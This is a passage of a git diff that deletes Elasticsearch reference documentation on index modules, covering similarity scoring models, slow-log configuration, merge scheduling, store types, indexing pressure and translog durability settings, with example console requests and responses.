termination. - -NOTE: Aggregations will collect all documents that match the query regardless -of the value of `track_total_hits` - -[[index-modules-index-sorting-conjunctions]] -=== Use index sorting to speed up conjunctions - -Index sorting can be useful in order to organize Lucene doc ids (not to be -conflated with `_id`) in a way that makes conjunctions (a AND b AND ...) more -efficient. In order to be efficient, conjunctions rely on the fact that if any -clause does not match, then the entire conjunction does not match. By using -index sorting, we can put documents that do not match together, which will -help skip efficiently over large ranges of doc IDs that do not match the -conjunction. - -This trick only works with low-cardinality fields. A rule of thumb is that -you should sort first on fields that both have a low cardinality and are -frequently used for filtering. The sort order (`asc` or `desc`) does not -matter as we only care about putting values that would match the same clauses -close to each other. - -For instance if you were indexing cars for sale, it might be interesting to -sort by fuel type, body type, make, year of registration and finally mileage. diff --git a/docs/reference/index-modules/indexing-pressure.asciidoc b/docs/reference/index-modules/indexing-pressure.asciidoc deleted file mode 100644 index a91cfc04c21..00000000000 --- a/docs/reference/index-modules/indexing-pressure.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[[index-modules-indexing-pressure]] -== Indexing pressure - -Indexing documents into {es} introduces system load in the form of memory and -CPU load. Each indexing operation includes coordinating, primary, and replica -stages. These stages can be performed across multiple nodes in a cluster. - -Indexing pressure can build up through external operations, such as indexing -requests, or internal mechanisms, such as recoveries and {ccr}. If too much -indexing work is introduced into the system, the cluster can become saturated. -This can adversely impact other operations, such as search, cluster -coordination, and background processing. - -To prevent these issues, {es} internally monitors indexing load. When the load -exceeds certain limits, new indexing work is rejected - -[discrete] -[[indexing-stages]] -=== Indexing stages - -External indexing operations go through three stages: coordinating, primary, and -replica. See <>. - -[discrete] -[[memory-limits]] -=== Memory limits - -The `indexing_pressure.memory.limit` node setting restricts the number of bytes -available for outstanding indexing requests. This setting defaults to 10% of -the heap. - -At the beginning of each indexing stage, {es} accounts for the -bytes consumed by an indexing request. This accounting is only released at the -end of the indexing stage. This means that upstream stages will account for the -request overheard until all downstream stages are complete. For example, the -coordinating request will remain accounted for until primary and replica -stages are complete. The primary request will remain accounted for until each -in-sync replica has responded to enable replica retries if necessary. - -A node will start rejecting new indexing work at the coordinating or primary -stage when the number of outstanding coordinating, primary, and replica indexing -bytes exceeds the configured limit. - -A node will start rejecting new indexing work at the replica stage when the -number of outstanding replica indexing bytes exceeds 1.5x the configured limit. -This design means that as indexing pressure builds on nodes, they will naturally -stop accepting coordinating and primary work in favor of outstanding replica -work. - -The `indexing_pressure.memory.limit` setting's 10% default limit is generously -sized. You should only change it after careful consideration. Only indexing -requests contribute to this limit. This means there is additional indexing -overhead (buffers, listeners, etc) which also require heap space. Other -components of {es} also require memory. Setting this limit too high can deny -operating memory to other operations and components. - -[discrete] -[[indexing-pressure-monitoring]] -=== Monitoring - -You can use the -<> to -retrieve indexing pressure metrics. - -[discrete] -[[indexing-pressure-settings]] -=== Indexing pressure settings - -`indexing_pressure.memory.limit` {ess-icon}:: - Number of outstanding bytes that may be consumed by indexing requests. When - this limit is reached or exceeded, the node will reject new coordinating and - primary operations. When replica operations consume 1.5x this limit, the node - will reject new replica operations. Defaults to 10% of the heap. diff --git a/docs/reference/index-modules/mapper.asciidoc b/docs/reference/index-modules/mapper.asciidoc deleted file mode 100644 index 484aec18466..00000000000 --- a/docs/reference/index-modules/mapper.asciidoc +++ /dev/null @@ -1,8 +0,0 @@ -[[index-modules-mapper]] -== Mapper - -The mapper module acts as a registry for the type mapping definitions -added to an index either when creating it or by using the put mapping -api. It also handles the dynamic mapping support for types that have no -explicit mappings pre defined. For more information about mapping -definitions, check out the <>. diff --git a/docs/reference/index-modules/merge.asciidoc b/docs/reference/index-modules/merge.asciidoc deleted file mode 100644 index 3a262b0678e..00000000000 --- a/docs/reference/index-modules/merge.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[index-modules-merge]] -== Merge - -A shard in Elasticsearch is a Lucene index, and a Lucene index is broken down -into segments. Segments are internal storage elements in the index where the -index data is stored, and are immutable. Smaller segments are periodically -merged into larger segments to keep the index size at bay and to expunge -deletes. - -The merge process uses auto-throttling to balance the use of hardware -resources between merging and other activities like search. - -[discrete] -[[merge-scheduling]] -=== Merge scheduling - -The merge scheduler (ConcurrentMergeScheduler) controls the execution of merge -operations when they are needed. Merges run in separate threads, and when the -maximum number of threads is reached, further merges will wait until a merge -thread becomes available. - -The merge scheduler supports the following _dynamic_ setting: - -`index.merge.scheduler.max_thread_count`:: - - The maximum number of threads on a single shard that may be merging at once. - Defaults to - `Math.max(1, Math.min(4, <> / 2))` which - works well for a good solid-state-disk (SSD). If your index is on spinning - platter drives instead, decrease this to 1. - diff --git a/docs/reference/index-modules/similarity.asciidoc b/docs/reference/index-modules/similarity.asciidoc deleted file mode 100644 index 98569d8e7fc..00000000000 --- a/docs/reference/index-modules/similarity.asciidoc +++ /dev/null @@ -1,558 +0,0 @@ -[[index-modules-similarity]] -== Similarity module - -A similarity (scoring / ranking model) defines how matching documents -are scored. Similarity is per field, meaning that via the mapping one -can define a different similarity per field. - -Configuring a custom similarity is considered an expert feature and the -builtin similarities are most likely sufficient as is described in -<>. - -[discrete] -[[configuration]] -=== Configuring a similarity - -Most existing or custom Similarities have configuration options which -can be configured via the index settings as shown below. The index -options can be provided when creating an index or updating index -settings. - -[source,console] --------------------------------------------------- -PUT /index -{ - "settings": { - "index": { - "similarity": { - "my_similarity": { - "type": "DFR", - "basic_model": "g", - "after_effect": "l", - "normalization": "h2", - "normalization.h2.c": "3.0" - } - } - } - } -} --------------------------------------------------- - -Here we configure the DFR similarity so it can be referenced as -`my_similarity` in mappings as is illustrate in the below example: - -[source,console] --------------------------------------------------- -PUT /index/_mapping -{ - "properties" : { - "title" : { "type" : "text", "similarity" : "my_similarity" } - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -=== Available similarities - -[discrete] -[[bm25]] -==== BM25 similarity (*default*) - -TF/IDF based similarity that has built-in tf normalization and -is supposed to work better for short fields (like names). See -{wikipedia}/Okapi_BM25[Okapi_BM25] for more details. -This similarity has the following options: - -[horizontal] -`k1`:: - Controls non-linear term frequency normalization - (saturation). The default value is `1.2`. - -`b`:: - Controls to what degree document length normalizes tf values. - The default value is `0.75`. - -`discount_overlaps`:: - Determines whether overlap tokens (Tokens with - 0 position increment) are ignored when computing norm. By default this - is true, meaning overlap tokens do not count when computing norms. - -Type name: `BM25` - -[discrete] -[[dfr]] -==== DFR similarity - -Similarity that implements the -{lucene-core-javadoc}/org/apache/lucene/search/similarities/DFRSimilarity.html[divergence -from randomness] framework. This similarity has the following options: - -[horizontal] -`basic_model`:: - Possible values: {lucene-core-javadoc}/org/apache/lucene/search/similarities/BasicModelG.html[`g`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/BasicModelIF.html[`if`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/BasicModelIn.html[`in`] and - {lucene-core-javadoc}/org/apache/lucene/search/similarities/BasicModelIne.html[`ine`]. - -`after_effect`:: - Possible values: {lucene-core-javadoc}/org/apache/lucene/search/similarities/AfterEffectB.html[`b`] and - {lucene-core-javadoc}/org/apache/lucene/search/similarities/AfterEffectL.html[`l`]. - -`normalization`:: - Possible values: {lucene-core-javadoc}/org/apache/lucene/search/similarities/Normalization.NoNormalization.html[`no`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/NormalizationH1.html[`h1`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/NormalizationH2.html[`h2`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/NormalizationH3.html[`h3`] and - {lucene-core-javadoc}/org/apache/lucene/search/similarities/NormalizationZ.html[`z`]. - -All options but the first option need a normalization value. - -Type name: `DFR` - -[discrete] -[[dfi]] -==== DFI similarity - -Similarity that implements the https://trec.nist.gov/pubs/trec21/papers/irra.web.nb.pdf[divergence from independence] -model. -This similarity has the following options: - -[horizontal] -`independence_measure`:: Possible values - {lucene-core-javadoc}/org/apache/lucene/search/similarities/IndependenceStandardized.html[`standardized`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/IndependenceSaturated.html[`saturated`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/IndependenceChiSquared.html[`chisquared`]. - -When using this similarity, it is highly recommended *not* to remove stop words to get -good relevance. Also beware that terms whose frequency is less than the expected -frequency will get a score equal to 0. - -Type name: `DFI` - -[discrete] -[[ib]] -==== IB similarity. - -{lucene-core-javadoc}/org/apache/lucene/search/similarities/IBSimilarity.html[Information -based model] . The algorithm is based on the concept that the information content in any symbolic 'distribution' -sequence is primarily determined by the repetitive usage of its basic elements. -For written texts this challenge would correspond to comparing the writing styles of different authors. -This similarity has the following options: - -[horizontal] -`distribution`:: Possible values: - {lucene-core-javadoc}/org/apache/lucene/search/similarities/DistributionLL.html[`ll`] and - {lucene-core-javadoc}/org/apache/lucene/search/similarities/DistributionSPL.html[`spl`]. -`lambda`:: Possible values: - {lucene-core-javadoc}/org/apache/lucene/search/similarities/LambdaDF.html[`df`] and - {lucene-core-javadoc}/org/apache/lucene/search/similarities/LambdaTTF.html[`ttf`]. -`normalization`:: Same as in `DFR` similarity. - -Type name: `IB` - -[discrete] -[[lm_dirichlet]] -==== LM Dirichlet similarity. - -{lucene-core-javadoc}/org/apache/lucene/search/similarities/LMDirichletSimilarity.html[LM -Dirichlet similarity] . This similarity has the following options: - -[horizontal] -`mu`:: Default to `2000`. - -The scoring formula in the paper assigns negative scores to terms that have -fewer occurrences than predicted by the language model, which is illegal to -Lucene, so such terms get a score of 0. - -Type name: `LMDirichlet` - -[discrete] -[[lm_jelinek_mercer]] -==== LM Jelinek Mercer similarity. - -{lucene-core-javadoc}/org/apache/lucene/search/similarities/LMJelinekMercerSimilarity.html[LM -Jelinek Mercer similarity] . The algorithm attempts to capture important patterns in the text, while leaving out noise. This similarity has the following options: - -[horizontal] -`lambda`:: The optimal value depends on both the collection and the query. The optimal value is around `0.1` -for title queries and `0.7` for long queries. Default to `0.1`. When value approaches `0`, documents that match more query terms will be ranked higher than those that match fewer terms. - -Type name: `LMJelinekMercer` - -[discrete] -[[scripted_similarity]] -==== Scripted similarity - -A similarity that allows you to use a script in order to specify how scores -should be computed. For instance, the below example shows how to reimplement -TF-IDF: - -[source,console] --------------------------------------------------- -PUT /index -{ - "settings": { - "number_of_shards": 1, - "similarity": { - "scripted_tfidf": { - "type": "scripted", - "script": { - "source": "double tf = Math.sqrt(doc.freq); double idf = Math.log((field.docCount+1.0)/(term.docFreq+1.0)) + 1.0; double norm = 1/Math.sqrt(doc.length); return query.boost * tf * idf * norm;" - } - } - } - }, - "mappings": { - "properties": { - "field": { - "type": "text", - "similarity": "scripted_tfidf" - } - } - } -} - -PUT /index/_doc/1 -{ - "field": "foo bar foo" -} - -PUT /index/_doc/2 -{ - "field": "bar baz" -} - -POST /index/_refresh - -GET /index/_search?explain=true -{ - "query": { - "query_string": { - "query": "foo^1.7", - "default_field": "field" - } - } -} --------------------------------------------------- - -Which yields: - -[source,console-result] --------------------------------------------------- -{ - "took": 12, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.9508477, - "hits": [ - { - "_shard": "[index][0]", - "_node": "OzrdjxNtQGaqs4DmioFw9A", - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 1.9508477, - "_source": { - "field": "foo bar foo" - }, - "_explanation": { - "value": 1.9508477, - "description": "weight(field:foo in 0) [PerFieldSimilarity], result of:", - "details": [ - { - "value": 1.9508477, - "description": "score from ScriptedSimilarity(weightScript=[null], script=[Script{type=inline, lang='painless', idOrCode='double tf = Math.sqrt(doc.freq); double idf = Math.log((field.docCount+1.0)/(term.docFreq+1.0)) + 1.0; double norm = 1/Math.sqrt(doc.length); return query.boost * tf * idf * norm;', options={}, params={}}]) computed from:", - "details": [ - { - "value": 1.0, - "description": "weight", - "details": [] - }, - { - "value": 1.7, - "description": "query.boost", - "details": [] - }, - { - "value": 2, - "description": "field.docCount", - "details": [] - }, - { - "value": 4, - "description": "field.sumDocFreq", - "details": [] - }, - { - "value": 5, - "description": "field.sumTotalTermFreq", - "details": [] - }, - { - "value": 1, - "description": "term.docFreq", - "details": [] - }, - { - "value": 2, - "description": "term.totalTermFreq", - "details": [] - }, - { - "value": 2.0, - "description": "doc.freq", - "details": [] - }, - { - "value": 3, - "description": "doc.length", - "details": [] - } - ] - } - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 12/"took" : $body.took/] -// TESTRESPONSE[s/OzrdjxNtQGaqs4DmioFw9A/$body.hits.hits.0._node/] - -WARNING: While scripted similarities provide a lot of flexibility, there is -a set of rules that they need to satisfy. Failing to do so could make -Elasticsearch silently return wrong top hits or fail with internal errors at -search time: - - - Returned scores must be positive. - - All other variables remaining equal, scores must not decrease when - `doc.freq` increases. - - All other variables remaining equal, scores must not increase when - `doc.length` increases. - -You might have noticed that a significant part of the above script depends on -statistics that are the same for every document. It is possible to make the -above slightly more efficient by providing an `weight_script` which will -compute the document-independent part of the score and will be available -under the `weight` variable. When no `weight_script` is provided, `weight` -is equal to `1`. The `weight_script` has access to the same variables as -the `script` except `doc` since it is supposed to compute a -document-independent contribution to the score. - -The below configuration will give the same tf-idf scores but is slightly -more efficient: - -[source,console] --------------------------------------------------- -PUT /index -{ - "settings": { - "number_of_shards": 1, - "similarity": { - "scripted_tfidf": { - "type": "scripted", - "weight_script": { - "source": "double idf = Math.log((field.docCount+1.0)/(term.docFreq+1.0)) + 1.0; return query.boost * idf;" - }, - "script": { - "source": "double tf = Math.sqrt(doc.freq); double norm = 1/Math.sqrt(doc.length); return weight * tf * norm;" - } - } - } - }, - "mappings": { - "properties": { - "field": { - "type": "text", - "similarity": "scripted_tfidf" - } - } - } -} --------------------------------------------------- - -//////////////////// - -[source,console] --------------------------------------------------- -PUT /index/_doc/1 -{ - "field": "foo bar foo" -} - -PUT /index/_doc/2 -{ - "field": "bar baz" -} - -POST /index/_refresh - -GET /index/_search?explain=true -{ - "query": { - "query_string": { - "query": "foo^1.7", - "default_field": "field" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took": 1, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.9508477, - "hits": [ - { - "_shard": "[index][0]", - "_node": "OzrdjxNtQGaqs4DmioFw9A", - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 1.9508477, - "_source": { - "field": "foo bar foo" - }, - "_explanation": { - "value": 1.9508477, - "description": "weight(field:foo in 0) [PerFieldSimilarity], result of:", - "details": [ - { - "value": 1.9508477, - "description": "score from ScriptedSimilarity(weightScript=[Script{type=inline, lang='painless', idOrCode='double idf = Math.log((field.docCount+1.0)/(term.docFreq+1.0)) + 1.0; return query.boost * idf;', options={}, params={}}], script=[Script{type=inline, lang='painless', idOrCode='double tf = Math.sqrt(doc.freq); double norm = 1/Math.sqrt(doc.length); return weight * tf * norm;', options={}, params={}}]) computed from:", - "details": [ - { - "value": 2.3892908, - "description": "weight", - "details": [] - }, - { - "value": 1.7, - "description": "query.boost", - "details": [] - }, - { - "value": 2, - "description": "field.docCount", - "details": [] - }, - { - "value": 4, - "description": "field.sumDocFreq", - "details": [] - }, - { - "value": 5, - "description": "field.sumTotalTermFreq", - "details": [] - }, - { - "value": 1, - "description": "term.docFreq", - "details": [] - }, - { - "value": 2, - "description": "term.totalTermFreq", - "details": [] - }, - { - "value": 2.0, - "description": "doc.freq", - "details": [] - }, - { - "value": 3, - "description": "doc.length", - "details": [] - } - ] - } - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 1/"took" : $body.took/] -// TESTRESPONSE[s/OzrdjxNtQGaqs4DmioFw9A/$body.hits.hits.0._node/] - -//////////////////// - -Type name: `scripted` - -[discrete] -[[default-base]] -==== Default Similarity - -By default, Elasticsearch will use whatever similarity is configured as -`default`. - -You can change the default similarity for all fields in an index when -it is <>: - -[source,console] --------------------------------------------------- -PUT /index -{ - "settings": { - "index": { - "similarity": { - "default": { - "type": "boolean" - } - } - } - } -} --------------------------------------------------- - -If you want to change the default similarity after creating the index -you must <> your index, send the following -request and <> it again afterwards: - -[source,console] --------------------------------------------------- -POST /index/_close - -PUT /index/_settings -{ - "index": { - "similarity": { - "default": { - "type": "boolean" - } - } - } -} - -POST /index/_open --------------------------------------------------- -// TEST[continued] diff --git a/docs/reference/index-modules/slowlog.asciidoc b/docs/reference/index-modules/slowlog.asciidoc deleted file mode 100644 index 2bbc80e5e81..00000000000 --- a/docs/reference/index-modules/slowlog.asciidoc +++ /dev/null @@ -1,186 +0,0 @@ -[[index-modules-slowlog]] -== Slow Log - -[discrete] -[[search-slow-log]] -=== Search Slow Log - -Shard level slow search log allows to log slow search (query and fetch -phases) into a dedicated log file. - -Thresholds can be set for both the query phase of the execution, and -fetch phase, here is a sample: - -[source,yaml] --------------------------------------------------- -index.search.slowlog.threshold.query.warn: 10s -index.search.slowlog.threshold.query.info: 5s -index.search.slowlog.threshold.query.debug: 2s -index.search.slowlog.threshold.query.trace: 500ms - -index.search.slowlog.threshold.fetch.warn: 1s -index.search.slowlog.threshold.fetch.info: 800ms -index.search.slowlog.threshold.fetch.debug: 500ms -index.search.slowlog.threshold.fetch.trace: 200ms - -index.search.slowlog.level: info --------------------------------------------------- - -All of the above settings are _dynamic_ and can be set for each index using the -<> API. For example: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index.search.slowlog.threshold.query.warn": "10s", - "index.search.slowlog.threshold.query.info": "5s", - "index.search.slowlog.threshold.query.debug": "2s", - "index.search.slowlog.threshold.query.trace": "500ms", - "index.search.slowlog.threshold.fetch.warn": "1s", - "index.search.slowlog.threshold.fetch.info": "800ms", - "index.search.slowlog.threshold.fetch.debug": "500ms", - "index.search.slowlog.threshold.fetch.trace": "200ms", - "index.search.slowlog.level": "info" -} --------------------------------------------------- -// TEST[setup:my_index] - -By default, none are enabled (set to `-1`). Levels (`warn`, `info`, -`debug`, `trace`) allow to control under which logging level the log -will be logged. Not all are required to be configured (for example, only -`warn` threshold can be set). The benefit of several levels is the -ability to quickly "grep" for specific thresholds breached. - -The logging is done on the shard level scope, meaning the execution of a -search request within a specific shard. It does not encompass the whole -search request, which can be broadcast to several shards in order to -execute. Some of the benefits of shard level logging is the association -of the actual execution on the specific machine, compared with request -level. - -The logging file is configured by default using the following -configuration (found in `log4j2.properties`): - -[source,properties] --------------------------------------------------- -appender.index_search_slowlog_rolling.type = RollingFile -appender.index_search_slowlog_rolling.name = index_search_slowlog_rolling -appender.index_search_slowlog_rolling.fileName = ${sys:es.logs.base_path}${sys:file.separator}${sys:es.logs.cluster_name}_index_search_slowlog.log -appender.index_search_slowlog_rolling.layout.type = PatternLayout -appender.index_search_slowlog_rolling.layout.pattern = [%d{ISO8601}][%-5p][%-25c] [%node_name]%marker %.-10000m%n -appender.index_search_slowlog_rolling.filePattern = ${sys:es.logs.base_path}${sys:file.separator}${sys:es.logs.cluster_name}_index_search_slowlog-%i.log.gz -appender.index_search_slowlog_rolling.policies.type = Policies -appender.index_search_slowlog_rolling.policies.size.type = SizeBasedTriggeringPolicy -appender.index_search_slowlog_rolling.policies.size.size = 1GB -appender.index_search_slowlog_rolling.strategy.type = DefaultRolloverStrategy -appender.index_search_slowlog_rolling.strategy.max = 4 - -logger.index_search_slowlog_rolling.name = index.search.slowlog -logger.index_search_slowlog_rolling.level = trace -logger.index_search_slowlog_rolling.appenderRef.index_search_slowlog_rolling.ref = index_search_slowlog_rolling -logger.index_search_slowlog_rolling.additivity = false --------------------------------------------------- - -[discrete] -==== Identifying search slow log origin - -It is often useful to identify what triggered a slow running query. If a call was initiated with an `X-Opaque-ID` header, then the user ID -is included in Search Slow logs as an additional **id** field (scroll to the right). -[source,txt] ---------------------------- -[2030-08-30T11:59:37,786][WARN ][i.s.s.query ] [node-0] [index6][0] took[78.4micros], took_millis[0], total_hits[0 hits], stats[], search_type[QUERY_THEN_FETCH], total_shards[1], source[{"query":{"match_all":{"boost":1.0}}}], id[MY_USER_ID], ---------------------------- -// NOTCONSOLE -The user ID is also included in JSON logs. -[source,js] ---------------------------- -{ - "type": "index_search_slowlog", - "timestamp": "2030-08-30T11:59:37,786+02:00", - "level": "WARN", - "component": "i.s.s.query", - "cluster.name": "distribution_run", - "node.name": "node-0", - "message": "[index6][0]", - "took": "78.4micros", - "took_millis": "0", - "total_hits": "0 hits", - "stats": "[]", - "search_type": "QUERY_THEN_FETCH", - "total_shards": "1", - "source": "{\"query\":{\"match_all\":{\"boost\":1.0}}}", - "id": "MY_USER_ID", - "cluster.uuid": "Aq-c-PAeQiK3tfBYtig9Bw", - "node.id": "D7fUYfnfTLa2D7y-xw6tZg" -} ---------------------------- -// NOTCONSOLE - -[discrete] -[[index-slow-log]] -=== Index Slow log - -The indexing slow log, similar in functionality to the search slow -log. The log file name ends with `_index_indexing_slowlog.log`. Log and -the thresholds are configured in the same way as the search slowlog. -Index slowlog sample: - -[source,yaml] --------------------------------------------------- -index.indexing.slowlog.threshold.index.warn: 10s -index.indexing.slowlog.threshold.index.info: 5s -index.indexing.slowlog.threshold.index.debug: 2s -index.indexing.slowlog.threshold.index.trace: 500ms -index.indexing.slowlog.level: info -index.indexing.slowlog.source: 1000 --------------------------------------------------- - -All of the above settings are _dynamic_ and can be set for each index using the -<> API. For example: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index.indexing.slowlog.threshold.index.warn": "10s", - "index.indexing.slowlog.threshold.index.info": "5s", - "index.indexing.slowlog.threshold.index.debug": "2s", - "index.indexing.slowlog.threshold.index.trace": "500ms", - "index.indexing.slowlog.level": "info", - "index.indexing.slowlog.source": "1000" -} --------------------------------------------------- -// TEST[setup:my_index] - -By default Elasticsearch will log the first 1000 characters of the _source in -the slowlog. You can change that with `index.indexing.slowlog.source`. Setting -it to `false` or `0` will skip logging the source entirely an setting it to -`true` will log the entire source regardless of size. The original `_source` is -reformatted by default to make sure that it fits on a single log line. If preserving -the original document format is important, you can turn off reformatting by setting -`index.indexing.slowlog.reformat` to `false`, which will cause the source to be -logged "as is" and can potentially span multiple log lines. - -The index slow log file is configured by default in the `log4j2.properties` -file: - -[source,properties] --------------------------------------------------- -appender.index_indexing_slowlog_rolling.type = RollingFile -appender.index_indexing_slowlog_rolling.name = index_indexing_slowlog_rolling -appender.index_indexing_slowlog_rolling.fileName = ${sys:es.logs.base_path}${sys:file.separator}${sys:es.logs.cluster_name}_index_indexing_slowlog.log -appender.index_indexing_slowlog_rolling.layout.type = PatternLayout -appender.index_indexing_slowlog_rolling.layout.pattern = [%d{ISO8601}][%-5p][%-25c] [%node_name]%marker %.-10000m%n -appender.index_indexing_slowlog_rolling.filePattern = ${sys:es.logs.base_path}${sys:file.separator}${sys:es.logs.cluster_name}_index_indexing_slowlog-%i.log.gz -appender.index_indexing_slowlog_rolling.policies.type = Policies -appender.index_indexing_slowlog_rolling.policies.size.type = SizeBasedTriggeringPolicy -appender.index_indexing_slowlog_rolling.policies.size.size = 1GB -appender.index_indexing_slowlog_rolling.strategy.type = DefaultRolloverStrategy -appender.index_indexing_slowlog_rolling.strategy.max = 4 - -logger.index_indexing_slowlog.name = index.indexing.slowlog.index -logger.index_indexing_slowlog.level = trace -logger.index_indexing_slowlog.appenderRef.index_indexing_slowlog_rolling.ref = index_indexing_slowlog_rolling -logger.index_indexing_slowlog.additivity = false --------------------------------------------------- diff --git a/docs/reference/index-modules/store.asciidoc b/docs/reference/index-modules/store.asciidoc deleted file mode 100644 index 98f61e0ddab..00000000000 --- a/docs/reference/index-modules/store.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[index-modules-store]] -== Store - -The store module allows you to control how index data is stored and accessed on disk. - -NOTE: This is a low-level setting. Some store implementations have poor -concurrency or disable optimizations for heap memory usage. We recommend -sticking to the defaults. - -[discrete] -[[file-system]] -=== File system storage types - -There are different file system implementations or _storage types_. By default, -Elasticsearch will pick the best implementation based on the operating -environment. - -The storage type can also be explicitly set for all indices by configuring the -store type in the `config/elasticsearch.yml` file: - -[source,yaml] ---------------------------------- -index.store.type: hybridfs ---------------------------------- - -It is a _static_ setting that can be set on a per-index basis at index -creation time: - -[source,console] ---------------------------------- -PUT /my-index-000001 -{ - "settings": { - "index.store.type": "hybridfs" - } -} ---------------------------------- - -WARNING: This is an expert-only setting and may be removed in the future. - -The following sections lists all the different storage types supported. - -`fs`:: - -Default file system implementation. This will pick the best implementation -depending on the operating environment, which is currently `hybridfs` on all -supported systems but is subject to change. - -[[simplefs]]`simplefs`:: - -The Simple FS type is a straightforward implementation of file system -storage (maps to Lucene `SimpleFsDirectory`) using a random access file. -This implementation has poor concurrent performance (multiple threads -will bottleneck) and disables some optimizations for heap memory usage. - -[[niofs]]`niofs`:: - -The NIO FS type stores the shard index on the file system (maps to -Lucene `NIOFSDirectory`) using NIO. It allows multiple threads to read -from the same file concurrently. It is not recommended on Windows -because of a bug in the SUN Java implementation and disables some -optimizations for heap memory usage. - -[[mmapfs]]`mmapfs`:: - -The MMap FS type stores the shard index on the file system (maps to -Lucene `MMapDirectory`) by mapping a file into memory (mmap). Memory -mapping uses up a portion of the virtual memory address space in your -process equal to the size of the file being mapped. Before using this -class, be sure you have allowed plenty of -<>. - -[[hybridfs]]`hybridfs`:: - -The `hybridfs` type is a hybrid of `niofs` and `mmapfs`, which chooses the best -file system type for each type of file based on the read access pattern. -Currently only the Lucene term dictionary, norms and doc values files are -memory mapped. All other files are opened using Lucene `NIOFSDirectory`. -Similarly to `mmapfs` be sure you have allowed plenty of -<>. - -[[allow-mmap]] -You can restrict the use of the `mmapfs` and the related `hybridfs` store type -via the setting `node.store.allow_mmap`. This is a boolean setting indicating -whether or not memory-mapping is allowed. The default is to allow it. This -setting is useful, for example, if you are in an environment where you can not -control the ability to create a lot of memory maps so you need disable the -ability to use memory-mapping. - -[[preload-data-to-file-system-cache]] -=== Preloading data into the file system cache - -NOTE: This is an expert setting, the details of which may change in the future. - -By default, Elasticsearch completely relies on the operating system file system -cache for caching I/O operations. It is possible to set `index.store.preload` -in order to tell the operating system to load the content of hot index -files into memory upon opening. This setting accept a comma-separated list of -files extensions: all files whose extension is in the list will be pre-loaded -upon opening. This can be useful to improve search performance of an index, -especially when the host operating system is restarted, since this causes the -file system cache to be trashed. However note that this may slow down the -opening of indices, as they will only become available after data have been -loaded into physical memory. - -This setting is best-effort only and may not work at all depending on the store -type and host operating system. - -The `index.store.preload` is a static setting that can either be set in the -`config/elasticsearch.yml`: - -[source,yaml] ---------------------------------- -index.store.preload: ["nvd", "dvd"] ---------------------------------- - -or in the index settings at index creation time: - -[source,console] ---------------------------------- -PUT /my-index-000001 -{ - "settings": { - "index.store.preload": ["nvd", "dvd"] - } -} ---------------------------------- - -The default value is the empty array, which means that nothing will be loaded -into the file-system cache eagerly. For indices that are actively searched, -you might want to set it to `["nvd", "dvd"]`, which will cause norms and doc -values to be loaded eagerly into physical memory. These are the two first -extensions to look at since Elasticsearch performs random access on them. - -A wildcard can be used in order to indicate that all files should be preloaded: -`index.store.preload: ["*"]`. Note however that it is generally not useful to -load all files into memory, in particular those for stored fields and term -vectors, so a better option might be to set it to -`["nvd", "dvd", "tim", "doc", "dim"]`, which will preload norms, doc values, -terms dictionaries, postings lists and points, which are the most important -parts of the index for search and aggregations. - -Note that this setting can be dangerous on indices that are larger than the size -of the main memory of the host, as it would cause the filesystem cache to be -trashed upon reopens after large merges, which would make indexing and searching -_slower_. diff --git a/docs/reference/index-modules/translog.asciidoc b/docs/reference/index-modules/translog.asciidoc deleted file mode 100644 index 0ad2a989f6f..00000000000 --- a/docs/reference/index-modules/translog.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[[index-modules-translog]] -== Translog - -Changes to Lucene are only persisted to disk during a Lucene commit, which is a -relatively expensive operation and so cannot be performed after every index or -delete operation. Changes that happen after one commit and before another will -be removed from the index by Lucene in the event of process exit or hardware -failure. - -Lucene commits are too expensive to perform on every individual change, so each -shard copy also writes operations into its _transaction log_ known as the -_translog_. All index and delete operations are written to the translog after -being processed by the internal Lucene index but before they are acknowledged. -In the event of a crash, recent operations that have been acknowledged but not -yet included in the last Lucene commit are instead recovered from the translog -when the shard recovers. - -An {es} <> is the process of performing a Lucene commit and -starting a new translog generation. Flushes are performed automatically in the -background in order to make sure the translog does not grow too large, which -would make replaying its operations take a considerable amount of time during -recovery. The ability to perform a flush manually is also exposed through an -API, although this is rarely needed. - -[discrete] -=== Translog settings - -The data in the translog is only persisted to disk when the translog is -++fsync++ed and committed. In the event of a hardware failure or an operating -system crash or a JVM crash or a shard failure, any data written since the -previous translog commit will be lost. - -By default, `index.translog.durability` is set to `request` meaning that -Elasticsearch will only report success of an index, delete, update, or bulk -request to the client after the translog has been successfully ++fsync++ed and -committed on the primary and on every allocated replica. If -`index.translog.durability` is set to `async` then Elasticsearch ++fsync++s and -commits the translog only every `index.translog.sync_interval` which means that -any operations that were performed just before a crash may be lost when the node -recovers. - -The following <> per-index -settings control the behaviour of the translog: - -`index.translog.sync_interval`:: - - How often the translog is ++fsync++ed to disk and committed, regardless of - write operations. Defaults to `5s`. Values less than `100ms` are not allowed. - -`index.translog.durability`:: -+ --- - -Whether or not to `fsync` and commit the translog after every index, delete, -update, or bulk request. This setting accepts the following parameters: - -`request`:: - - (default) `fsync` and commit after every request. In the event of hardware - failure, all acknowledged writes will already have been committed to disk. - -`async`:: - - `fsync` and commit in the background every `sync_interval`. In - the event of a failure, all acknowledged writes since the last - automatic commit will be 